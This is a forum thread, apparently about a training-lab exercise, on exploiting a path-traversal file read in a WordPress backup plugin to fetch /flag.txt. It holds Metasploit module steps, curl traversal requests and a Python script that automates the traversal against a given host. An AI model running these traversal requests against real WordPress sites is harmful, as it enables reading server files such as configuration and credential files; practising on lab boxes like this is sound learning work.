Getting Started | Public Exploit | Quick solve

Hello, it’s x69h4ck3r. I am gonna make this as straightforward as possible,

’cause you may have spent hours on this.

OK, let’s jump into it.

Step 1: Search for the plugin exploit on the web.
Example: search on google.com like this: “Backup Plugin 2.7.10 for WordPress exploit”.
When done, you will get lots of results.
Pick the one from rapid7; it’s short…

On rapid7 the Metasploit exploit for this vulnerability
is shown: “wp_simple_backup_file_read”.
We then go to our terminal and fire up the Metasploit Framework
in order to use this exploit on our target server.

Step 2: Fire up the Metasploit database.

Run this command in your terminal to start up the PostgreSQL DB:

systemctl start postgresql

Run this command to start Metasploit:

msfconsole

Search for the exploit using this command:

search exploit wordpress plugin backup

Locate “wp_simple_backup_file_read” and use the command below:

use auxiliary/scanner/http/wp_simple_backup_file_read

Once the module is loaded, type “show options”.

Change RHOSTS to the target IP;

change RPORT to the target port;

change FILEPATH to /flag.txt.

Press enter, then cross-check your parameters with the “show options” command.

Once satisfied, type the “run” or “exploit” command to get the exploit working,

and the flag will be downloaded into the .msf4/loot/ folder.

You can use "locate /.msf4/loot/" to locate and move into the directory

and then read the file with the “cat” command…

I hope this was useful… please like and comment, and let me know if this solved your problem.

:smile:

8 Likes

When I do this, nothing downloads into the loot folder. It just says:

msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Here are my options for reference:

msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > options

Module options (auxiliary/scanner/http/wp_simple_backup_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /flag.txt        yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     142.93.47.26     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      30633            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

What do you think? What am I doing wrong? Is there something wrong with the box?

1 Like

I’ll just reply to myself. I ended up using pwnbox and it worked, lol. Hours later. Ugh.

For the record, I also tried it with just “flag.txt” (no quotes) as the filepath… and a lot of other things, including a bunch of stuff you’d expect to see in /etc.

Your settings are correct. I just ran it with this and was successful. Not sure why it wouldn’t have worked.

Thank you so much, mate. That really worked :smiley:

For a minute I got confused when I didn’t see the msf output. Later I realized I forgot to set the RPORT associated with the target IP. Once I did, I got the output.

See whether all the parameters are provided.

Two questions:
1) The nmap of my Target Instance is as follows:
nmap -sV -A -p<Target Instance Port #> <Target Instance IP address without Port #>
PORT STATE SERVICE VERSION
<Target Instance Port #>/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.6.1
|_http-title: Getting Started – Just another WordPress site
|_http-server-header: Apache/2.4.41 (Ubuntu)

How should we know to target the WordPress application and not Apache 2.4.41?

2) How would we know (aside from the tip) to use a ‘plugin’ type of attack against the WordPress application?

2 Likes

If anyone isn’t getting a file output, sudoing msfconsole worked for me.

Well, that was annoying. Why would it work using pwnbox but not my regular machine…

It’s asking for a password…

Thank you, this got me in the right direction.

Thanks for this. I got as far as running the exploit, but I didn’t know where to look for the flag. How did you know it would be found in .msf4/loot/?

Simple. Run curl -v "http://<ip>:<port>/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../flag.txt" to get the flag.

1 Like
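The manual request in the reply above, and the traversal that the Metasploit module in the first post automates, written out as a small Python probe. This is an added example, not code from the original posts or from Metasploit; it assumes only the endpoint and parameter names visible in the curl line (/wp-admin/tools.php?page=backup_manager&download_backup_file=...). The host, port, flag text and the fake_target stand-in are constructed placeholders. It mirrors the module’s DEPTH option by walking the ../ count upward and names the thread’s “nothing downloads” case (an HTTP 200 with an empty body) instead of leaving you with no output.

```python
"""Manual probe for the Simple Backup file-read traversal discussed in the thread.

Added example: not code from the original posts or from Metasploit. The endpoint
and parameter names come from the curl line in the thread; everything else
(host, port, flag text, the fake_target stand-in) is constructed for illustration.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Optional

ENDPOINT = "/wp-admin/tools.php"  # from the thread's curl line

# A fetcher takes a URL and returns (status, body); swapping it lets the
# same probe run against a live box or the constructed stand-in below.
Fetcher = Callable[[str], tuple[int, bytes]]


def build_url(base: str, filepath: str, depth: int) -> str:
    """Prepend `depth` levels of ../ to filepath, like the module's DEPTH option.

    The plugin serves files relative to its backup directory, so the traversal
    has to climb far enough to reach / before a path such as /flag.txt resolves.
    """
    traversal = "../" * depth + filepath.lstrip("/")
    query = urllib.parse.urlencode(
        {"page": "backup_manager", "download_backup_file": traversal},
        safe="/",  # keep the slashes readable; the server decodes either form
    )
    return base.rstrip("/") + ENDPOINT + "?" + query


def classify(status: int, body: bytes) -> str:
    """Name the outcome instead of leaving the reader with silent 'no output'."""
    if status != 200:
        return f"http-{status}"
    if not body.strip():
        # The case several replies hit: request answered, nothing served.
        # Usually wrong depth, wrong path, or the request never reached the box.
        return "empty"
    if b"<html" in body[:512].lower():
        # A WordPress page came back instead of the file: check TARGETURI/VHOST.
        return "html"
    return "file"


def probe(base: str, filepath: str, max_depth: int, fetch: Fetcher) -> list[tuple[int, str, bytes]]:
    """Try depth 1..max_depth and stop at the first depth that returns a file."""
    results: list[tuple[int, str, bytes]] = []
    for depth in range(1, max_depth + 1):
        status, body = fetch(build_url(base, filepath, depth))
        verdict = classify(status, body)
        results.append((depth, verdict, body))
        if verdict == "file":
            break
    return results


def http_fetch(url: str, proxy: Optional[str] = None, timeout: float = 10.0) -> tuple[int, bytes]:
    """Live fetcher. proxy="http://127.0.0.1:8080" routes the request via Burp."""
    handlers = []
    if proxy:
        handlers.append(urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
    opener = urllib.request.build_opener(*handlers)
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def fake_target(url: str) -> tuple[int, bytes]:
    """Constructed stand-in for the box: the plugin directory sits four levels below /.

    Any other depth answers 200 with an empty body, which is what the
    'nothing downloads into loot' replies were seeing on the wire.
    """
    params = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
    requested = params.get("download_backup_file", [""])[0]
    if requested == "../../../../flag.txt":
        return 200, b"HTB{constructed_example_flag}\n"  # constructed, not a real flag
    return 200, b""


if __name__ == "__main__":
    if len(sys.argv) > 1:
        base = sys.argv[1]                                  # e.g. http://<ip>:<port>
        proxy = sys.argv[2] if len(sys.argv) > 2 else None  # e.g. http://127.0.0.1:8080
        fetch: Fetcher = lambda u: http_fetch(u, proxy=proxy)
    else:
        base, fetch = "http://target.example:8080", fake_target  # constructed
    for depth, verdict, body in probe(base, "/flag.txt", 6, fetch):
        print(f"depth={depth} verdict={verdict} bytes={len(body)}")
        if verdict == "file":
            sys.stdout.write(body.decode(errors="replace"))
```

Run it with no arguments to exercise the constructed stand-in, or pass the base URL and, optionally, a proxy such as http://127.0.0.1:8080 as a second argument to send the live requests through Burp, as a later reply in this thread suggests.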

This was a lifesaver, bro… thank you.

1 Like

The output will tell you where it is.

Add sudo before the command.

Same situation here

I got this after running your command. I’m running it on my host, and the msfconsole exploit also shows no output with correct parameters.

When playing around with web requests and you get an error like this, it’s always helpful to use Burp Suite to intercept the request and response and check what the root cause is.
curl -v -x http://127.0.0.1:8080 "http://<ip>:<port>/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../flag.txt"
The -x http://127.0.0.1:8080 flag here indicates that the request will go through the Burp Suite proxy. Once you capture the request, send it to Repeater and play around with the request there. You’ll find out whether the payload is incorrect or there is some problem with the network/VPN.